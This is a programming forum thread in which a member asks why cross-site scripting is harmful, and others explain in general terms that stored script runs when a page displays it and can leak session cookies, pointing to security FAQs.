• Post Reply Bookmark Topic Watch Topic
  • New Topic
programming forums Java Mobile Certification Databases Caching Books Engineering Micro Controllers OS Languages Paradigms IDEs Build Tools Frameworks Application Servers Open Source This Site Careers Other Pie Elite all forums
this forum made possible by our volunteer staff, including ...
Marshals:
  • Campbell Ritchie
  • Jeanne Boyarsky
  • Ron McLeod
  • Paul Clapham
  • Liutauras Vilda
Sheriffs:
  • paul wheaton
  • Rob Spoor
  • Devaka Cooray
Saloon Keepers:
  • Stephan van Hulst
  • Tim Holloway
  • Carey Brown
  • Frits Walraven
  • Tim Moores
Bartenders:
  • Mikalai Zaikin

cross site scripting

 
Ranch Hand
Posts: 348
  • Mark post as helpful
  • send pies
    Number of slices to send:
    Optional 'thank-you' note:
  • Quote
  • Report post to moderator
I've been googling about cross site scripting. for now, I understand that it's a form of injecting malicious script into some input field which will then be saved into database. Can anybody show me why this is harmful? lets say I'm opening a personal information screen to apply for an online shopping website membership, I type in some malicious script into the first name field and submitted the form. the first name field will then be persisted to the website's database, so where's the harm? I'm still not following. can anybody please enlighten me on this issue? thanks
 
Rancher
Posts: 43081
77
  • Mark post as helpful
  • send pies
    Number of slices to send:
    Optional 'thank-you' note:
  • Quote
  • Report post to moderator
The harm is not in that script being stored on the server, the harm is in that script being executed when you call up a page that executes it (in your example that would be a page displaying your first name). But this is a big subject, and many treatises have been written about it; the https://coderanch.com/how-to/java/SecurityFaq#web-apps points to a couple of them that discuss XSS at length.
 
David Spades
Ranch Hand
Posts: 348
  • Mark post as helpful
  • send pies
    Number of slices to send:
    Optional 'thank-you' note:
  • Quote
  • Report post to moderator
I just found out that cross site scripting can be used to steal your session. how does this work? Does the hacker need to have access to the victim's computer in order for this to work? thanks
 
author & internet detective
Posts: 41860
908
Eclipse IDE VI Editor Java
  • Mark post as helpful
  • send pies
    Number of slices to send:
    Optional 'thank-you' note:
  • Quote
  • Report post to moderator
David,
A XSS attack can send your session cookie to the hacker. See this OWASP page for other ways a hacker could steal your session cookie. And the attacker does not need access to the victim's computer for this to work.
 
Don't count your weasels before they've popped. And now for a mulberry bush related tiny ad:
a bit of art, as a gift, the permaculture playing cards
https://gardener-gift.com
reply
    Bookmark Topic Watch Topic
  • New Topic